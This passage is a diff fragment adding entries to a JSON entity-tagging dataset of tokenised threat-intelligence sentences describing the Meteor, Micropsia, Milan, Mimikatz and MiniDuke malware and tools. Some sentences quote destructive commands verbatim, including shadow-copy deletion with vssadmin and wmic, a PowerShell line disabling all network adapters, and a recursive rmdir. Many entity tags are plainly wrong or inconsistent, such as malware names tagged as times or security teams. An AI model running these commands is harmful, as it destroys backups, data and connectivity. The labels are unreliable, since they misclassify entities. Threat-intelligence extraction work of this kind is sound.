"B-Time", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "will", + "delete", + "the", + "folder", + "containing", + "malicious", + "scripts", + "if", + "it", + "detects", + "the", + "hostname", + "as", + "`PIS-APP`,", + "`PIS-MOB`,", + "`WSUSPROXY`,", + "or", + "`PIS-DB`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "use", + "group", + "policy", + "to", + "push", + "a", + "scheduled", + "task", + "from", + "the", + "AD", + "to", + "all", + "network", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "hide", + "its", + "console", + "window", + "upon", + "execution", + "to", + "decrease", + "its", + "visibility", + "to", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "has", + "the", + "ability", + "to", + "download", + "additional", + "files", + "for", + "execution", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "use", + "`bcdedit`", + "to", + "delete", + "different", + "boot", + "identifiers", + "on", + "a", + "compromised", + "host;", + "it", + "can", + "also", + "use", + "`vssadmin.exe", + "delete", + "shadows", + "/all", + "/quiet`", + "and", + "`C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe", + "shadowcopy", + "delete`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "change", + "both", + "the", + "desktop", + "wallpaper", + "and", + "the", + "lock", + "screen", + "image", + "to", + "a", + "custom", + "image." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "has", + "been", + "disguised", + "as", + "the", + "Windows", + "Power", + "Efficiency", + "Diagnostics", + "report", + "tool." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "use", + "`WinAPI`", + "to", + "remove", + "a", + "victim", + "machine", + "from", + "an", + "Active", + "Directory", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "use", + "PowerShell", + "commands", + "to", + "disable", + "the", + "network", + "adapters", + "on", + "a", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "check", + "if", + "a", + "specific", + "process", + "is", + "running,", + "such", + "as", + "Kaspersky's", + "`avp.exe`." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SamFile" + ] + }, + { + "tokens": [ + "Meteor", + "execution", + "begins", + "from", + "a", + "scheduled", + "task", + "named", + "`Microsoft\\Windows\\Power", + "Efficiency", + "Diagnostics\\AnalyzeAll`", + "and", + "it", + "creates", + "a", + "separate", + "scheduled", + "task", + "called", + "`mstask`", + "to", + "run", + "the", + "wiper", + "only", + "once", + "at", + "23:55:00." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "has", + "the", + "ability", + "to", + "search", + "for", + "Kaspersky", + "Antivirus", + "on", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "disconnect", + "all", + "network", + "adapters", + "on", + "a", + "compromised", + "host", + "using", + "`powershell", + "-Command", + "\"Get-WmiObject", + "-class", + "Win32_NetworkAdapter", + "|", + "ForEach", + "{", + "If", + "($.NetEnabled)", + "{", + "$.Disable()", + "}", + "}\"", + ">", + "NUL`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "has", + "the", + "ability", + "to", + "discover", + "the", + "hostname", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "run", + "`set.bat`,", + "`update.bat`,", + "`cache.bat`,", + "`bcd.bat`,", + "`msrun.bat`,", + "and", + "similar", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Meteor", + "can", + "use", + "`wmic.exe`", + "as", + "part", + "of", + "its", + "effort", + "to", + "delete", + "shadow", + "copies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "creates", + "a", + "RAR", + "archive", + "based", + "on", + "collected", + "files", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "can", + "perform", + "microphone", + "recording." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "executes", + "an", + "RAR", + "tool", + "to", + "recursively", + "archive", + "files", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions", + "(*.xls,", + "*.xlsx,", + "*.csv,", + "*.odt,", + "*.doc,", + "*.docx,", + "*.ppt,", + "*.pptx,", + "*.pdf,", + "*.mdb,", + "*.accdb,", + "*.accde,", + "*.txt)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Micropsia", + "obfuscates", + "the", + "configuration", + "with", + "a", + "custom", + "Base64", + "and", + "XOR." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "can", + "perform", + "a", + "recursive", + "directory", + "listing", + "for", + "all", + "volume", + "drives", + "available", + "on", + "the", + "victim's", + "machine", + "and", + "can", + "also", + "fetch", + "specific", + "files", + "by", + "their", + "paths." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "creates", + "a", + "new", + "hidden", + "directory", + "to", + "store", + "all", + "components'", + "outputs", + "in", + "a", + "dedicated", + "sub-folder", + "for", + "each." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "can", + "download", + "and", + "execute", + "an", + "executable", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "has", + "keylogging", + "capabilities." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "takes", + "screenshots", + "every", + "90", + "seconds", + "by", + "calling", + "the", + "Gdi32.BitBlt", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "searches", + "for", + "anti-virus", + "software", + "and", + "firewall", + "products", + "installed", + "on", + "the", + "victim’s", + "machine", + "using", + "WMI." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Micropsia", + "creates", + "a", + "shortcut", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "gathers", + "the", + "hostname", + "and", + "OS", + "version", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "collects", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "network", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Micropsia", + "creates", + "a", + "command-line", + "shell", + "using", + "cmd.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Micropsia", + "searches", + "for", + "anti-virus", + "software", + "and", + "firewall", + "products", + "installed", + "on", + "the", + "victim’s", + "machine", + "using", + "WMI." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Milan", + "can", + "use", + "a", + "COM", + "component", + "to", + "generate", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "has", + "the", + "ability", + "to", + "use", + "DNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "use", + "hardcoded", + "domains", + "as", + "an", + "input", + "for", + "domain", + "generation", + "algorithms." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "has", + "used", + "an", + "executable", + "named", + "`companycatalog.exe.config`", + "to", + "appear", + "benign." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "encode", + "files", + "containing", + "information", + "about", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "delete", + "files", + "via", + "`C:\\Windows\\system32\\cmd.exe", + "/c", + "ping", + "1.1.1.1", + "-n", + "1", + "-w", + "3000", + ">", + "Nul", + "&", + "rmdir", + "/s", + "/q`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Milan", + "has", + "received", + "files", + "from", + "C2", + "and", + "stored", + "them", + "in", + "log", + "folders", + "beginning", + "with", + "the", + "character", + "sequence", + "`a9850d2f`." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "has", + "run", + "`C:\\Windows\\system32\\cmd.exe", + "/c", + "cmd", + "/c", + "dir", + "c:\\users\\", + "/s", + "2>&1`", + "to", + "discover", + "local", + "accounts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "has", + "saved", + "files", + "prior", + "to", + "upload", + "from", + "a", + "compromised", + "host", + "to", + "folders", + "beginning", + "with", + "the", + "characters", + "`a9850d2f`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "has", + "used", + "an", + "executable", + "named", + "`companycatalogue`", + "to", + "appear", + "benign." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "use", + "the", + "API", + "`DnsQuery_A`", + "for", + "DNS", + "resolution." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "use", + "a", + "custom", + "protocol", + "tunneled", + "through", + "DNS", + "or", + "HTTP." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Milan", + "can", + "query", + "`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", + "MachineGuid`", + "to", + "retrieve", + "the", + "machine", + "GUID." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "establish", + "persistence", + "on", + "a", + "targeted", + "host", + "with", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "enumerate", + "the", + "targeted", + "machine's", + "name", + "and", + "GUID." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "run", + "`C:\\Windows\\system32\\cmd.exe", + "/c", + "cmd", + "/c", + "ipconfig", + "/all", + "2>&1`", + "to", + "discover", + "network", + "settings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "identify", + "users", + "registered", + "to", + "a", + "targeted", + "machine." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "use", + "HTTPS", + "for", + "communication", + "with", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Milan", + "can", + "use", + "`cmd.exe`", + "for", + "discovery", + "actions", + "on", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MimiPenguin", + "can", + "use", + "the", + "`<PID>/maps`", + "and", + "`<PID>/mem`", + "file", + "to", + "search", + "for", + "regex", + "patterns", + "and", + "dump", + "the", + "process", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Mimikatz", + "credential", + "dumper", + "has", + "been", + "extended", + "to", + "include", + "Skeleton", + "Key", + "domain", + "controller", + "authentication", + "bypass", + "functionality.", + "The", + "<code>LSADUMP::ChangeNTLM</code>", + "and", + "<code>LSADUMP::SetNTLM</code>", + "modules", + "can", + "also", + "manipulate", + "the", + "password", + "hash", + "of", + "an", + "account", + "without", + "knowing", + "the", + "clear", + "text", + "value." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "performs", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "useful", + "in", + "gaining", + "access", + "to", + "additional", + "systems", + "and", + "enterprise", + "network", + "resources.", + "It", + "contains", + "functionality", + "to", + "acquire", + "information", + "about", + "credentials", + "in", + "many", + "ways,", + "including", + "from", + "the", + "credential", + "vault", + "and", + "DPAPI." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mimikatz", + "performs", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "useful", + "in", + "gaining", + "access", + "to", + "additional", + "systems", + "and", + "enterprise", + "network", + "resources.", + "It", + "contains", + "functionality", + "to", + "acquire", + "information", + "about", + "credentials", + "in", + "many", + "ways,", + "including", + "from", + "DPAPI." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mimikatz", + "performs", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "useful", + "in", + "gaining", + "access", + "to", + "additional", + "systems", + "and", + "enterprise", + "network", + "resources.", + "It", + "contains", + "functionality", + "to", + "acquire", + "information", + "about", + "credentials", + "in", + "many", + "ways,", + "including", + "from", + "DCSync/NetSync." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Mimikatz's", + "kerberos", + "module", + "can", + "create", + "golden", + "tickets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "performs", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "useful", + "in", + "gaining", + "access", + "to", + "additional", + "systems", + "and", + "enterprise", + "network", + "resources.", + "It", + "contains", + "functionality", + "to", + "acquire", + "information", + "about", + "credentials", + "in", + "many", + "ways,", + "including", + "from", + "the", + "LSA." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "performs", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "useful", + "in", + "gaining", + "access", + "to", + "additional", + "systems", + "and", + "enterprise", + "network", + "resources.", + "It", + "contains", + "functionality", + "to", + "acquire", + "information", + "about", + "credentials", + "in", + "many", + "ways,", + "including", + "from", + "the", + "LSASS", + "Memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz's", + "<code>SEKURLSA::Pth</code>", + "module", + "can", + "impersonate", + "a", + "user,", + "with", + "only", + "a", + "password", + "hash,", + "to", + "execute", + "arbitrary", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz’s", + "<code>LSADUMP::DCSync</code>", + "and", + "<code>KERBEROS::PTT</code>", + "modules", + "implement", + "the", + "three", + "steps", + "required", + "to", + "extract", + "the", + "krbtgt", + "account", + "hash", + "and", + "create/use", + "Kerberos", + "tickets." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz's", + "<code>CRYPTO::Extract</code>", + "module", + "can", + "extract", + "keys", + "by", + "interacting", + "with", + "Windows", + "cryptographic", + "application", + "programming", + "interface", + "(API)", + "functions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz’s", + "<code>LSADUMP::DCShadow</code>", + "module", + "can", + "be", + "used", + "to", + "make", + "AD", + "updates", + "by", + "temporarily", + "setting", + "a", + "computer", + "to", + "be", + "a", + "DC." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz's", + "<code>MISC::AddSid</code>", + "module", + "can", + "append", + "any", + "SID", + "or", + "user/group", + "account", + "to", + "a", + "user's", + "SID-History.", + "Mimikatz", + "also", + "utilizes", + "SID-History", + "Injection", + "to", + "expand", + "the", + "scope", + "of", + "other", + "components", + "such", + "as", + "generated", + "Kerberos", + "Golden", + "Tickets", + "and", + "DCSync", + "beyond", + "a", + "single", + "domain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "B-SecTeam", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "performs", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "useful", + "in", + "gaining", + "access", + "to", + "additional", + "systems", + "and", + "enterprise", + "network", + "resources.", + "It", + "contains", + "functionality", + "to", + "acquire", + "information", + "about", + "credentials", + "in", + "many", + "ways,", + "including", + "from", + "the", + "SAM", + "table." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Mimikatz", + "credential", + "dumper", + "contains", + "an", + "implementation", + "of", + "an", + "SSP." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Mimikatz's", + "kerberos", + "module", + "can", + "create", + "silver", + "tickets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Mimikatz's", + "`CRYPTO`", + "module", + "can", + "create", + "and", + "export", + "various", + "types", + "of", + "authentication", + "certificates." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Mimikatz", + "contains", + "functionality", + "to", + "acquire", + "credentials", + "from", + "the", + "Windows", + "Credential", + "Manager." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Miner-C", + "copies", + "itself", + "into", + "the", + "public", + "folder", + "of", + "Network", + "Attached", + "Storage", + "(NAS)", + "devices", + "and", + "infects", + "new", + "victims", + "who", + "open", + "the", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "MiniDuke", + "components", + "use", + "Twitter", + "to", + "initially", + "obtain", + "the", + "address", + "of", + "a", + "C2", + "server", + "or", + "as", + "a", + "backup", + "if", + "no", + "hard-coded", + "C2", + "server", + "responds." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Org", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "can", + "use", + "DGA", + "to", + "generate", + "new", + "Twitter", + "URLs", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "uses", + "Google", + "Search", + "to", + "identify", + "C2", + "servers", + "if", + "its", + "primary", + "C2", + "method", + "via", + "Twitter", + "is", + "not", + "working." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "can", + "enumerate", + "local", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "can", + "download", + "additional", + "encrypted", + "backdoors", + "onto", + "the", + "victim", + "via", + "GIF", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "can", + "can", + "use", + "a", + "named", + "pipe", + "to", + "forward", + "communications", + "from", + "one", + "compromised", + "machine", + "with", + "internet", + "access", + "to", + "other", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "can", + "use", + "control", + "flow", + "flattening", + "to", + "obscure", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MiniDuke", + "can", + "gather", + "the", + "hostname", + "on", + "a", + "compromised", + 